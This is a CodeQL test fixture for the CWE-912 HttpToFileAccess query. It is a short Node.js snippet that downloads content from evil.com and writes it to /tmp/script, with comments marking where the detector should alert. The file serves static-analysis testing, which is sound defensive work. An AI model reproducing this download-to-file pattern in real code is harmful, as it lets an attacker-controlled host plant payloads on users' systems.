Files
codeql/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js
2025-02-28 13:29:30 +01:00

9 lines
197 B
JavaScript

var https = require("https");
var fs = require("fs");
https.get('https://evil.com/script', res => {
res.on("data", d => { // $ Source
fs.writeFileSync("/tmp/script", d) // $ Alert
});
});